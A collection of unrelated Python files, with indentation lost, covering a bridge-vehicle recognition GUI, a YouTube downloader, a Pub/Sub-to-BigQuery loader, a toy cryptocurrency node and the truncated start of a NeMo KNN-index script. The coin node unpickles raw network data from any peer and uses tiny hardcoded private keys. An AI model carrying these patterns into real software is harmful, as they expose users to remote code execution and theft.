from PIL import Image, ImageTk
from tkinter import scrolledtext
from PIL import Image, ImageDraw, ImageFont
class GUI():
def __init__(self, width=1300, height=650):
self.w = width
self.h = height
self.title = "桥梁车载识别系统"
self.root = tk.Tk(className=self.title)
self.root.iconbitmap('tk.ico')
self.list1 = tk.StringVar()
self.list2 = tk.StringVar()
self.list3 = tk.StringVar()
self.list1.set("test.mp4")
#页面一
self.page0 = tk.Frame(self.root)
self.photo = tk.PhotoImage(file='桥梁背景.png')
tk.Label(self.page0, text="桥梁车载时空分布识别系统", justify="center", image=self.photo, compound="center", font=("华文行楷", 50), fg="blue").place(x=0, y=0, width=1300, height=600)
#text_label.pack()
#tk.Label(self.page0, font=('楷体', 50), text="桥梁车载时空分布识别系统").place(relx=0.5, rely=0.5, anchor=tk.CENTER)
self.page0.pack(fill=tk.BOTH, expand=True)
#页面二
self.page1 = tk.Frame(self.root)
self.frame1_1 = tk.Frame(self.page1)
self.frame1_2 = tk.Frame(self.page1)
self.frame1_2_1 = tk.Frame(self.frame1_2)
self.frame1_2_2 = tk.Frame(self.frame1_2)
self.frame1_2_2_1 = tk.Frame(self.frame1_2_2)
self.frame1_2_2_2 = tk.Frame(self.frame1_2_2)
label1_1 = tk.Label(self.frame1_1, text="")
label1_2 = tk.Label(self.frame1_1, font=('楷体', 25), text="桥梁上高清摄像机显示与识别")
label1_3 = tk.Label(self.frame1_1, text="")
label1_4 = tk.Label(self.frame1_2_1, font=('楷体',15), text="拍摄画面")
self.canvas1_1 = tk.Canvas(self.frame1_2_1, width=800, height=500, bg="#c4c2c2")
label1_5 = tk.Label(self.frame1_2_2_1, font=('楷体',15), text="请输入视频地址:")
entry1_1 = tk.Entry(self.frame1_2_2_1, textvariable=self.list1, highlightcolor="Fuchsia", highlightthickness=1, width=50)
label1_6 = tk.Label(self.frame1_2_2_1, text="")
label1_7 = tk.Label(self.frame1_2_2_1, font=('楷体',15), text="识别结果")
self.scrolledtext1_1 = scrolledtext.ScrolledText(self.frame1_2_2_1, font=('楷体',10), width=50, height=27, wrap=tk.WORD)
label1_8 = tk.Label(self.frame1_2_2_1, text="")
button1_1 = tk.Button(self.frame1_2_2_2, text="打开", font=('楷体',15), fg='Purple', width=15, height=2, command=self.video_open)
label1_9 = tk.Label(self.frame1_2_2_2, text=" ")
button1_2 = tk.Button(self.frame1_2_2_2, text="识别", font=('楷体',15), fg='Purple', width=15, height=2, command=self.detect_stop)
label1_10 = tk.Label(self.frame1_2_2_2, text=" ")
button1_3 = tk.Button(self.frame1_2_2_2, text="停止", font=('楷体',15), fg='Purple', width=15, height=2, command=self.video_close)
self.frame1_1.pack()
self.frame1_2.pack()
self.frame1_2_1.grid(row=0, column=0)
self.frame1_2_2.grid(row=0, column=1)
self.frame1_2_2_1.grid(row=0, column=0)
self.frame1_2_2_2.grid(row=1, column=0)
label1_1.grid(row=0, column=0)
label1_2.grid(row=1, column=0)
label1_3.grid(row=2, column=0)
label1_4.grid(row=0, column=0)
self.canvas1_1.grid(row=1, column=0)
label1_5.grid(row=0, column=0)
entry1_1.grid(row=1, column=0)
label1_6.grid(row=2, column=0)
label1_7.grid(row=3, column=0)
self.scrolledtext1_1.grid(row=4, column=0)
label1_8.grid(row=5, column=0)
button1_1.grid(row=0, column=0)
label1_9.grid(row=0, column=1)
button1_2.grid(row=0, column=2)
label1_10.grid(row=0, column=3)
button1_3.grid(row=0, column=4)
self.page1.forget()
#页面三
self.page2 = tk.Frame(self.root, bg='red')
self.page2.forget()
self.create_page()
self.vr = VR()
def create_page(self):
menu = tk.Menu(self.root)
self.root.config(menu=menu)
filemenu1 = tk.Menu(menu, tearoff=0)
menu.add_cascade(label='车牌识别展示', menu=filemenu1)
filemenu1.add_command(label='开始', command=self.page1_show)
filemenu2 = tk.Menu(menu, tearoff=0)
menu.add_cascade(label='车流结果展示', menu=filemenu2)
filemenu2.add_command(label='开始', command=self.page2_show)
def page1_show(self):
self.page0.forget()
self.page1.pack(fill=tk.BOTH, expand=True)
self.page2.forget()
def page2_show(self):
self.page0.forget()
self.page1.forget()
self.page2.pack(fill=tk.BOTH, expand=True)
@staticmethod
def thread_it(func, *args):
t = Thread(target=func, args=args)
t.setDaemon(True) # 守护--就算主界面关闭,线程也会留守后台运行(不对!)
t.start() # 启动
def video_open(self):
self.scrolledtext1_1.delete(0.0, "end")
self.list2.set("1")
self.list3.set("0")
video = self.list1.get()
t1 = time.time()
cap = cv2.VideoCapture(video)
while cap.isOpened():
if self.list2.get() == "1":
ret, frame = cap.read()
if ret == True:
self.video_play(frame)
if self.list3.get() == "1":
self.thread_it(self.video_detect, frame)
else:
break
else:
break
cap.release()
print(time.time()-t1)
def plt_rec(self, image):
fontc = ImageFont.truetype("simsun.ttc", 20, encoding="unic")
cv2.rectangle(image, (int(333), int(147)), (int(542), int(392)), (0, 0, 255), 2, cv2.LINE_AA)
image = Image.fromarray(image)
draw = ImageDraw.Draw(image)
draw.text((int(333)+10, int(147)-30), "ROI(500*500)", (0, 0, 255), font=fontc)
imagex = np.array(image)
return imagex
def video_play(self, frame):
img = cv2.resize(frame, (800, 500), interpolation=cv2.INTER_CUBIC)
img = self.plt_rec(img)
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
if isinstance(img, np.ndarray):
img = Image.fromarray(img.astype(np.uint8))
photo = ImageTk.PhotoImage(image=img)
self.canvas1_1.create_image([400, 250], image=photo)
self.canvas1_1.update_idletasks()
self.canvas1_1.update()
def video_detect(self, frame):
image = frame[200 : 700, 700 : 1200]
result = self.vr.main(image)
if result != None:
print(result[1])
self.scrolledtext1_1.insert("insert", result[1]+"-"+str(300)+'\n')
def detect_stop(self):
self.list3.set("1")
def video_close(self):
self.list2.set("0")
def center(self):
ws = self.root.winfo_screenwidth()
hs = self.root.winfo_screenheight()
x = int((ws/2) - (self.w/2))
y = int((hs/2) - (self.h/2))
self.root.geometry("{}x{}+{}+{}".format(self.w, self.h, x, y))
#监听到关闭窗体的后,弹出提示信息框,提示是否真的要关闭,若是的话,则关闭
def window_close_handle(self):
if tk.messagebox.askyesnocancel("关闭确认窗口","确认要关闭窗口吗?"):
self.root.destroy()#关闭窗口
#函数说明:loop等待用户事件
def loop(self):
#禁止修改窗口大小
self.root.resizable(False, False)
#窗口居中
self.center()
self.root.protocol('WM_DELETE_WINDOW', self.window_close_handle)
self.root.mainloop()
if __name__ == "__main__":
gui = GUI()
gui.loop()
|
YouTube Downloader.py
|
import os
import requests
import tkinter as tk
from tkinter import *
import threading
from pytube import YouTube
import pyperclip as pc
import validators as vd
from PIL import ImageTk, Image
from io import BytesIO
root = tk.Tk()
root.title("Youtube Video Downloader")
img = ImageTk.PhotoImage(Image.open("Assets/Images/Default.png"))
L_image = Label(root, image=img)
dir_path = os.getcwd()
def ret_copied_url():
url = pc.paste()
if vd.url(url):
return url
else:
return "https://www.youtube.com/watch?v=32HANv-bdJs"
def callbackInput(v_url):
print("Changed input.")
return True
def callbackEntry(v_url):
return True
def changed(*options):
print("Changed option: " + selectedOption.get())
# variables
qualityOptions = ["Select Quality"]
selectedOption = StringVar(root)
v_url = StringVar(root)
my_proxy = {"http": "", "https": ""}
v_url.trace("w", lambda name, index, mode, v_url=v_url: callbackInput(v_url))
selectedOption.trace("w", changed)
# Entries
E_url = Entry(
root,
textvariable=v_url,
validate="focusout",
validatecommand=callbackEntry(v_url),
width="75",
)
E_url.insert(END, ret_copied_url())
# Menu
qualityOptionsMenu = OptionMenu(root, selectedOption, *qualityOptions)
selectedOption.set("Select Quality")
videoTitle = Label(text="Video title")
def printtit(obj):
videoTitle.config(text=obj.title)
def onok():
url = E_url.get()
print(url)
video = YouTube(url)
printtit(obj=video)
# video.set_filename("DownLoaded YouTube Video")
videoStreams = video.streams.all()
qualityOptions = []
for stream in videoStreams:
if stream.resolution != None:
qualityOptions.append(
stream.resolution
+ " "
+ stream.subtype
+ " "
+ str(round(stream.filesize / 1048576, 1))
+ "Mb tag: "
+ stream.itag
)
# Reset selectedOption and delete all old options
selectedOption.set("")
qualityOptionsMenu["menu"].delete(0, "end")
for option in qualityOptions:
qualityOptionsMenu["menu"].add_command(
label=option, command=tk._setit(selectedOption, option)
)
selectedOption.set(qualityOptions[0])
# printing Video Thumbnail
t_url = video.thumbnail_url
response = requests.get(t_url)
img = Image.open(BytesIO(response.content))
img = ImageTk.PhotoImage(img)
L_image.configure(image=img)
root.mainloop()
def ondown():
def downloading(url, Selected_Option):
pathe = os.path.expanduser("~") + "/Downloads"
os.chdir(pathe)
def progress_function(stream, chunk, file_handle, bytes_remaining):
percentage = round((1 - bytes_remaining / stream.filesize) * 100)
L_gif.configure(image=frames[percentage])
frames = [
PhotoImage(
file=dir_path + "/Assets/Images/percent.gif",
format="gif -index %i" % (i),
)
for i in range(101)
]
W_download = tk.Toplevel(height=300, width=300)
video = YouTube(url, on_progress_callback=progress_function)
W_download.title("Downloading " + video.title)
downloading_message = (
"The video : "
+ video.title
+ " is being downloaded, and will appear in your default downloads directory"
)
Message(W_download, text=downloading_message).pack()
L_gif = Label(W_download, image=frames[0])
L_gif.pack()
if Selected_Option == "Select Quality":
video.streams.first().download()
print("Default video downloaded.")
else:
selectedOptionList = Selected_Option.split()
selectedItag = selectedOptionList[-1]
selectedStream = video.streams.get_by_itag(selectedItag)
selectedStream.download()
print("Selected video downloaded.")
W_download.destroy()
os.chdir(dir_path)
L_gif.configure(image=frames[100])
url = E_url.get()
Selected_Option = selectedOption.get()
t_downloading = threading.Thread(target=downloading, args=(url, Selected_Option))
t_downloading.start()
def Set_proxy_window():
W_proxy = tk.Toplevel()
W_proxy.title("Proxy Set-up")
# variables
v_http = StringVar(W_proxy)
v_https = StringVar(W_proxy)
# Entries
E_http = Entry(W_proxy, textvariable=v_http)
E_https = Entry(W_proxy, textvariable=v_https)
def Set_Proxy():
print("Setting Proxy")
if E_http.get() != "" and E_https.get() != "":
my_proxy["http"] = "http://" + E_http.get()
my_proxy["https"] = "https://" + E_https.get()
os.environ["NO_PROXY"] = ""
print(my_proxy["https"])
elif E_http.get() != "":
my_proxy["http"] = "http://" + E_http.get()
os.environ["NO_PROXY"] = "https://*"
elif E_https.get() != "":
my_proxy["https"] = "https://" + E_https.get()
os.environ["NO_PROXY"] = "http://*"
else:
os.environ["NO_PROXY"] = "*"
os.environ["HTTP_PROXY"] = my_proxy["http"]
os.environ["HTTPS_PROXY"] = my_proxy["https"]
W_proxy.destroy()
# Buttons
B_okay = Button(W_proxy, text="Okay", command=Set_Proxy)
B_cancel = Button(W_proxy, text="Cancel", command=W_proxy.destroy)
# Placing
Label(W_proxy, text="http :").place(x=15, y=15)
E_http.place(x=65, y=15)
Label(W_proxy, text="https :").place(x=15, y=40)
E_https.place(x=65, y=40)
B_okay.place(x=20, y=70)
B_cancel.place(x=155, y=70)
# setting proxy window size and position
W_proxy.geometry("250x110+300+300")
def func(event):
pathe = os.path.expanduser("~") + "/Downloads"
os.chdir(pathe)
url = E_url.get()
video = YouTube(url)
stream = video.streams.first()
print(os.getcwd())
stream.download()
root.bind("<Return>", func)
# Buttons
B_refresh = Button(root, text="Refresh", command=onok)
B_setproxy = Button(root, text="Set Proxy", command=Set_proxy_window)
B_downlaod = Button(root, text="Download", command=ondown)
B_exit = Button(root, text="CLOSE", fg="red", command=root.destroy)
# Placing
Label(text="Link :").place(x=20, y=20)
E_url.place(y=20, x=60, width=400)
videoTitle.place(x=15, y=50, width=450)
qualityOptionsMenu.place(x=25, y=75, width=220)
B_setproxy.place(x=45, y=110)
B_downlaod.place(x=135, y=110)
B_exit.place(x=100, y=145)
B_refresh.place(y=170, x=320)
L_image.place(x=300, y=75, height=90, width=120)
# setting root window size and position
root.geometry("475x205+300+300")
root.mainloop()
|
pubsub2bq.py
|
#!/usr/bin/env python
import argparse
import json
from datetime import datetime
import threading, queue
import os
def pubsub2bq(
project_id, subscription_id, dataset_id, table_id, timeout=None
):
"""Receives messages from a pull subscription with flow control."""
# [START pubsub_subscriber_flow_settings]
from google.cloud import pubsub_v1
from google.cloud import bigquery
# queue
q = queue.Queue()
# TODO(developer)
# project_id = "your-project-id"
# subscription_id = "your-subscription-id"
# Number of seconds the subscriber should listen for messages
# timeout = 5.0
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_id
)
def callback(message):
print("Received message: {}".format(message.data))
jsonmsg = json.loads(message.data)
jsonmsg['timestamp'] = datetime.utcfromtimestamp(jsonmsg['timestamp']).isoformat()
print('json: {}'.format(jsonmsg))
q.put(jsonmsg)
message.ack()
# bigquery client
client = bigquery.Client(project=project_id)
dataset_ref = client.dataset(dataset_id)
table_ref = dataset_ref.table(table_id)
def worker_bq():
print('Running worker_bq')
t = threading.currentThread()
while getattr(t, 'do_run', True):
jsonmsg = q.get()
print('bq load')
try:
job = client.load_table_from_json([jsonmsg], table_ref)
job.result()
except:
os._exit(1)
print('Finish worker_bq')
# Limit the subscriber to only have ten outstanding messages at a time.
flow_control = pubsub_v1.types.FlowControl(max_messages=10)
streaming_pull_future = subscriber.subscribe(
subscription_path, callback=callback, flow_control=flow_control
)
print("Listening for messages on {}..".format(subscription_path))
print("Insert messages to {}..\n".format(table_ref.path))
# start worker_bq thread
t = threading.Thread(target=worker_bq, name='worker_bq')
t.start()
print('Start subscriber')
# Wrap subscriber in a 'with' block to automatically call close() when done.
with subscriber:
try:
# When `timeout` is not set, result() will block indefinitely,
# unless an exception is encountered first.
streaming_pull_future.result(timeout=timeout)
except TimeoutError:
streaming_pull_future.cancel()
setattr(t, 'do_run', False)
t.join()
# [END pubsub_subscriber_flow_settings]
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("project_id", help="Google Cloud project ID")
parser.add_argument("subscription_id", help="PubSub subscription ID")
parser.add_argument("dataset_id", help="BigQuery dataset ID")
parser.add_argument("table_id", help="BigQuery table ID")
args = parser.parse_args()
pubsub2bq(args.project_id, args.subscription_id, args.dataset_id, args.table_id)
|
powp2pcoin_three.py
|
"""
POW Syndacoin
Usage:
pow_syndacoin.py.py serve
pow_syndacoin.py.py ping [--node <node>]
pow_syndacoin.py.py tx <from> <to> <amount> [--node <node>]
pow_syndacoin.py.py balance <name> [--node <node>]
Options:
-h --help Show this screen.
--node=<node> Hostname of node [default: node0]
"""
import uuid, socketserver, socket, sys, argparse, time, os, logging, threading, hashlib, random, re, pickle
from docopt import docopt
from copy import deepcopy
from ecdsa import SigningKey, SECP256k1
PORT = 10000
GET_BLOCKS_CHUNK = 10
BLOCK_SUBSIDY = 50
node = None
logging.basicConfig(level="INFO", format='%(threadName)-6s | %(message)s')
logger = logging.getLogger(__name__)
def spend_message(tx, index):
outpoint = tx.tx_ins[index].outpoint
return serialize(outpoint) + serialize(tx.tx_outs)
class Tx:
def __init__(self, id, tx_ins, tx_outs):
self.id = id
self.tx_ins = tx_ins
self.tx_outs = tx_outs
def sign_input(self, index, private_key):
message = spend_message(self, index)
signature = private_key.sign(message)
self.tx_ins[index].signature = signature
def verify_input(self, index, public_key):
tx_in = self.tx_ins[index]
message = spend_message(self, index)
return public_key.verify(tx_in.signature, message)
@property
def is_coinbase(self):
return self.tx_ins[0].tx_id is None
def __eq__(self, other):
return self.id == other.id
class TxIn:
def __init__(self, tx_id, index, signature=None):
self.tx_id = tx_id
self.index = index
self.signature = signature
@property
def outpoint(self):
return (self.tx_id, self.index)
class TxOut:
def __init__(self, tx_id, index, amount, public_key):
self.tx_id = tx_id
self.index = index
self.amount = amount
self.public_key = public_key
@property
def outpoint(self):
return (self.tx_id, self.index)
class Block:
def __init__(self, txns, prev_id, nonce):
self.txns = txns
self.prev_id = prev_id
self.nonce = nonce
@property
def header(self):
return serialize(self)
@property
def id(self):
return hashlib.sha256(self.header).hexdigest()
@property
def proof(self):
return int(self.id, 16)
def __repr__(self):
return f"Block(prev_id={self.prev_id[:10]}... id={self.id[:10]}...)"
class Node:
def __init__(self, address):
self.blocks = []
self.utxo_set = {}
self.mempool = []
self.peers = []
self.pending_peers = []
self.address = address
def connect(self, peer):
if peer not in self.peers and peer != self.address:
logger.info(f'(handshake) Sent "connect" to {peer[0]}')
try:
send_message(peer, "connect", None)
self.pending_peers.append(peer)
except:
logger.info(f'(handshake) Node {peer[0]} offline')
def sync(self):
blocks = self.blocks[-GET_BLOCKS_CHUNK:]
block_ids = [block.id for block in blocks]
for peer in self.peers:
send_message(peer, "sync", block_ids)
def fetch_utxos(self, public_key):
return [tx_out for tx_out in self.utxo_set.values()
if tx_out.public_key == public_key]
def update_utxo_set(self, tx):
# Remove utxos that were just spent
if not tx.is_coinbase:
for tx_in in tx.tx_ins:
del self.utxo_set[tx_in.outpoint]
# Save utxos which were just created
for tx_out in tx.tx_outs:
self.utxo_set[tx_out.outpoint] = tx_out
# Clean up mempool
if tx in self.mempool:
self.mempool.remove(tx)
def fetch_balance(self, public_key):
# Fetch utxos associated with this public key
utxos = self.fetch_utxos(public_key)
# Sum the amounts
return sum([tx_out.amount for tx_out in utxos])
def validate_tx(self, tx):
in_sum = 0
out_sum = 0
for index, tx_in in enumerate(tx.tx_ins):
# TxIn spending an unspent output
assert tx_in.outpoint in self.utxo_set
# Grab the tx_out
tx_out = self.utxo_set[tx_in.outpoint]
# Verify signature using public key of TxOut we're spending
public_key = tx_out.public_key
tx.verify_input(index, public_key)
# Sum up the total inputs
amount = tx_out.amount
in_sum += amount
for tx_out in tx.tx_outs:
# Sum up the total outpouts
out_sum += tx_out.amount
# Check no value created or destroyed
assert in_sum == out_sum
def validate_coinbase(self, tx):
assert len(tx.tx_ins) == len(tx.tx_outs) == 1
assert tx.tx_outs[0].amount == BLOCK_SUBSIDY
def handle_tx(self, tx):
if tx not in self.mempool:
self.validate_tx(tx)
self.mempool.append(tx)
# Propogate transaction
for peer in self.peers:
send_message(peer, "tx", tx)
def validate_block(self, block):
assert block.proof < POW_TARGET, "Insufficient Proof-of-Work"
assert block.prev_id == self.blocks[-1].id
def handle_block(self, block):
# Check work, chain ordering
self.validate_block(block)
# Validate coinbase separately
self.validate_coinbase(block.txns[0])
# Check the transactions are valid
for tx in block.txns[1:]:
self.validate_tx(tx)
# If they're all good, update self.blocks and self.utxo_set
for tx in block.txns:
self.update_utxo_set(tx)
# Add the block to our chain
self.blocks.append(block)
logger.info(f"Block accepted: height={len(self.blocks) - 1}")
# Block propogation
for peer in self.peers:
send_message(peer, "blocks", [block])
def prepare_simple_tx(utxos, sender_private_key, recipient_public_key, amount):
sender_public_key = sender_private_key.get_verifying_key()
# Construct tx.tx_outs
tx_ins = []
tx_in_sum = 0
for tx_out in utxos:
tx_ins.append(TxIn(tx_id=tx_out.tx_id, index=tx_out.index, signature=None))
tx_in_sum += tx_out.amount
if tx_in_sum > amount:
break
# Make sure sender can afford it
assert tx_in_sum >= amount
# Construct tx.tx_outs
tx_id = uuid.uuid4()
change = tx_in_sum - amount
tx_outs = [
TxOut(tx_id=tx_id, index=0, amount=amount, public_key=recipient_public_key),
TxOut(tx_id=tx_id, index=1, amount=change, public_key=sender_public_key),
]
# Construct tx and sign inputs
tx = Tx(id=tx_id, tx_ins=tx_ins, tx_outs=tx_outs)
for i in range(len(tx.tx_ins)):
tx.sign_input(i, sender_private_key)
return tx
def prepare_coinbase(public_key, tx_id=None):
if tx_id is None:
tx_id = uuid.uuid4()
return Tx(
id=tx_id,
tx_ins=[
TxIn(None, None, None),
],
tx_outs=[
TxOut(tx_id=tx_id, index=0, amount=BLOCK_SUBSIDY,
public_key=public_key),
],
)
##########
# Mining #
##########
DIFFICULTY_BITS = 15
POW_TARGET = 2 ** (256 - DIFFICULTY_BITS)
mining_interrupt = threading.Event()
def mine_block(block):
while block.proof >= POW_TARGET:
# TODO: accept interrupts here if tip changes
if mining_interrupt.is_set():
logger.info("Mining interrupted")
mining_interrupt.clear()
return
block.nonce += 1
return block
def mine_forever(public_key):
logging.info("Starting miner")
while True:
coinbase = prepare_coinbase(public_key)
unmined_block = Block(
txns=[coinbase] + node.mempool,
prev_id=node.blocks[-1].id,
nonce=random.randint(0, 1000000000),
)
mined_block = mine_block(unmined_block)
if mined_block:
logger.info("")
logger.info("Mined a block")
node.handle_block(mined_block)
def mine_genesis_block(public_key):
global node
coinbase = prepare_coinbase(public_key, tx_id="abc123")
unmined_block = Block(txns=[coinbase], prev_id=None, nonce=0)
mined_block = mine_block(unmined_block)
node.blocks.append(mined_block)
node.update_utxo_set(coinbase)
##############
# Networking #
##############
def serialize(coin):
return pickle.dumps(coin)
def deserialize(serialized):
return pickle.loads(serialized)
def read_message(s):
message = b''
# Our protocol is: first 4 bytes signify message length
raw_message_length = s.recv(4) or b"\x00"
message_length = int.from_bytes(raw_message_length, 'big')
while message_length > 0:
chunk = s.recv(1024)
message += chunk
message_length -= len(chunk)
return deserialize(message)
def prepare_message(command, data):
message = {
"command": command,
"data": data,
}
serialized_message = serialize(message)
length = len(serialized_message).to_bytes(4, 'big')
return length + serialized_message
class TCPHandler(socketserver.BaseRequestHandler):
def get_canonical_peer_address(self):
ip = self.client_address[0]
try:
hostname = socket.gethostbyaddr(ip)
hostname = re.search(r"_(.*?)_", hostname[0]).group(1)
except:
hostname = ip
return (hostname, PORT)
def respond(self, command, data):
response = prepare_message(command, data)
return self.request.sendall(response)
def handle(self):
message = read_message(self.request)
command = message["command"]
data = message["data"]
peer = self.get_canonical_peer_address()
# Handshake / Authentication
if command == "connect":
if peer not in node.pending_peers and peer not in node.peers:
node.pending_peers.append(peer)
logger.info(f'(handshake) Accepted "connect" request from "{peer[0]}"')
send_message(peer, "connect-response", None)
elif command == "connect-response":
if peer in node.pending_peers and peer not in node.peers:
node.pending_peers.remove(peer)
node.peers.append(peer)
logger.info(f'(handshake) Connected to "{peer[0]}"')
send_message(peer, "connect-response", None)
# Request their peers
send_message(peer, "peers", None)
# else:
# assert peer in node.peers, \
# f"Rejecting {command} from unconnected {peer[0]}"
# Business Logic
if command == "peers":
send_message(peer, "peers-response", node.peers)
if command == "peers-response":
for peer in data:
node.connect(peer)
if command == "ping":
self.respond(command="pong", data="")
if command == "sync":
# Find our most recent block peer doesn't know about,
# But which build off a block they do know about.
peer_block_ids = data
for block in node.blocks[::-1]:
if block.id not in peer_block_ids \
and block.prev_id in peer_block_ids:
height = node.blocks.index(block)
blocks = node.blocks[height:height+GET_BLOCKS_CHUNK]
send_message(peer, "blocks", blocks)
logger.info('Served "sync" request')
return
logger.info('Could not serve "sync" request')
if command == "blocks":
for block in data:
try:
node.handle_block(block)
mining_interrupt.set()
except:
logger.info("Rejected block")
if len(data) == GET_BLOCKS_CHUNK:
node.sync()
if command == "tx":
node.handle_tx(data)
if command == "balance":
balance = node.fetch_balance(data)
self.respond(command="balance-response", data=balance)
if command == "utxos":
utxos = node.fetch_utxos(data)
self.respond(command="utxos-response", data=utxos)
def external_address(node):
i = int(node[-1])
port = PORT + i
return ('localhost', port)
def serve():
logger.info("Starting server")
server = socketserver.TCPServer(("0.0.0.0", PORT), TCPHandler)
server.serve_forever()
def send_message(address, command, data, response=False):
message = prepare_message(command, data)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect(address)
s.sendall(message)
if response:
return read_message(s)
#######
# CLI #
#######
def lookup_private_key(name):
exponent = {
"alice": 1, "bob": 2, "node0": 3, "node1": 4, "node2": 5
}[name]
return SigningKey.from_secret_exponent(exponent, curve=SECP256k1)
def lookup_public_key(name):
return lookup_private_key(name).get_verifying_key()
def main(args):
if args["serve"]:
threading.current_thread().name = "main"
name = os.environ["NAME"]
duration = 10 * ["node0", "node1", "node2"].index(name)
time.sleep(duration)
global node
node = Node(address=(name, PORT))
# Alice is Satoshi!
mine_genesis_block(lookup_public_key("alice"))
# Start server thread
server_thread = threading.Thread(target=serve, name="server")
server_thread.start()
# Join the network
peers = [(p, PORT) for p in os.environ['PEERS'].split(',')]
for peer in peers:
node.connect(peer)
# Wait for peer connections
time.sleep(1)
# Do initial block download
node.sync()
# Wait for IBD to finish
time.sleep(1)
# Start miner thread
miner_public_key = lookup_public_key(name)
miner_thread = threading.Thread(target=mine_forever,
args=[miner_public_key], name="miner")
miner_thread.start()
elif args["ping"]:
address = external_address(args["--node"])
send_message(address, "ping", "")
elif args["balance"]:
public_key = lookup_public_key(args["<name>"])
address = external_address(args["--node"])
response = send_message(address, "balance", public_key, response=True)
print(response["data"])
elif args["tx"]:
# Grab parameters
sender_private_key = lookup_private_key(args["<from>"])
sender_public_key = sender_private_key.get_verifying_key()
recipient_private_key = lookup_private_key(args["<to>"])
recipient_public_key = recipient_private_key.get_verifying_key()
amount = int(args["<amount>"])
address = external_address(args["--node"])
# Fetch utxos available to spend
response = send_message(address, "utxos", sender_public_key, response=True)
utxos = response["data"]
# Prepare transaction
tx = prepare_simple_tx(utxos, sender_private_key, recipient_public_key, amount)
# send to node
send_message(address, "tx", tx)
else:
print("Invalid command")
if __name__ == '__main__':
main(docopt(__doc__))
|
build_knn_map_index.py
|
# Copyright (c) 2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This is the script to build KNN index map from Training dataset to Retrieval dataset.
For example, it maps chunk_id i from training dataset to K chunk ids in the nearest neighbor in the retrieval dataset.
It requires the training text data to be converted into `bin` and `idx` files by `preprocess_data_for_megatron.py` script.
It also requires the Faiss Index file for the Retrieval dataset built by `build_retrieval_index.py` script.
Here is an example to using it:
```python
python scripts/nlp_language_modeling/build_knn_map_index.py \
--input_file=PATH_TO_INPUT_TRAINING_DATA \
--tokenizer-library=sentencepiece \
--tokenizer-model=tokenizer.model \
--process_chunk_size=51200 \
--K_neighbors=16 \
--faiss_index=PATH_TO_FAISS_INDEX_FILE \
--devices=0,1,2,3 \
--batch_size=1280 \
--remove_duplicate \
--output_file=knn_map.idx
```
Use `--remove_duplicate` flag if the data and retrieval dataset are the same. It will remove the neighbors from the same document.
It creates a knn_map.idx KNNIndex file.
During training of RETRO model, it can look up the KNN chunk ids of the
DB dataset given the input training data chunk id.
"""
import argparse
import multiprocessing
import faiss
import numpy as np
from numba import njit, prange
from sentence_transformers import SentenceTransformer
from nemo.collections.nlp.data.language_modeling.megatron.indexed_retrieval_dataset import (
KNNIndex,
MMapRetrievalIndexedDataset,
)
from nemo.collections.nlp.modules.common.tokenizer_utils import get_nmt_tokenizer
from nemo.utils import logging
QUEUE_SIZE = 30
queue = multiprocessing.Queue(QUEUE_SIZE)
emb_queue = multiprocessing.Queue(QUEUE_SIZE)
@njit(parallel=True)
def build_map(chunk_start, result, total_chunks):
"""
build the map from chunk_id to document id
"""
size = len(chunk_start)
for i in prange(size):
beg = chunk_start[i]
end = chunk_start[i + 1] if i < size - 1 else total_chunks
result[beg:end] = i
@njit(parallel=True)
def dedup(chunk_id_to_doc_id_map, I, tmp_neighbors, chunk_id_start):
"""
deduplicate the KNN who are from the same document as the data chunks.
chunk_id_to_doc_id_map is calculated by build_map function.
I is original KNN search result from Faiss.
chunk_id_start is the chunk_id offset.
filtered KNN will be stored in the tmp_neighbors
"""
for cid in prange(len(I)):
source_doc_id = chunk_id_to_doc_id_map[chunk_id_start + cid]
position = 0
for target_chunk_id in I[cid]:
if chunk_id_start + cid == target_chunk_id:
continue
target_doc_id = chunk_id_to_doc_id_map[target_chunk_id]
if source_doc_id != target_doc_id:
tmp_neighbors[cid, position] = target_chunk_id
position += 1
def get_tokenizer(args):
tokenizer = get_nmt_tokenizer(
library=args.tokenizer_library,
model_name=args.tokenizer_type,
tokenizer_model=args.tokenizer_model,
vocab_file=args.vocab_file,
merges_file=args.merge_file,
delimiter=args.delimiter,
)
if not hasattr(tokenizer, "pad_id"):
tokenizer.add_special_tokens({'pad_token': '<pad>'})
elif hasattr(tokenizer, "pad_id") and (tokenizer.pad_id is None or tokenizer.pad_id < 0):
tokenizer.add_special_tokens({'pad_token': '<pad>'})
return tokenizer
def process_sentence_chunks(ds: MMapRetrievalIndexedDataset, tokenizer, chunk_size: int):
total_chunks = ds.chunks
start = 0
threshold = 0
while start < total_chunks:
if start / total_chunks > threshold:
logging.info(f"sentence processing {start / total_chunks} is done")
threshold += 0.1
id_slices = ds.get_chunk(slice(start, min(start + chunk_size, total_chunks)), force_no_cont_ids=True)
start = min(start + chunk_size, total_chunks)
sentences = [tokenizer.ids_to_text(ids) for ids in id_slices]
queue.put(sentences)
queue.put(None)
def get_sentence_chunks():
return queue.get()
def calculate_embedding(pool, batch_size):
while True:
sentences = get_sentence_chunks()
if sentences is None:
break
emb = model.encode_multi_process(sentences=sentences, pool=pool, batch_size=batch_size)
emb_queue.put(emb)
emb_queue.put(None)
def get_emb():
return emb_queue.get()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="build Faiss index",)
parser.add_argument(
'--input_file', type=str, required=True, help='Input file',
)
parser.add_argument("--faiss_index", type=str, required=True, help='faiss index file for retrieval dataset')
parser.add_argument(
'--process_chunk_size',
type=int,
default=10000,
help='The sentences in chunks that is queries to build map index',
)
parser.add_argument(
'--remove_duplicate',
action='store_true',
help='Remove the knn neighbors that is from the same document as the data.',
)
parser.add_argument(
'--K_neighbors', type=int, default=16, help='The number of neighbors to query',
)
parser.add_argument(
'--dedup_margin',
type=int,
default=2,
help='extra neighbors to fill the spaces of the chunks in the duplicated documents',
)
parser.add_argument(
'--sentence_transformer_model',
type=str,
default='bert-base-nli-mean-tokens',
help='sentence transformer to load',
)
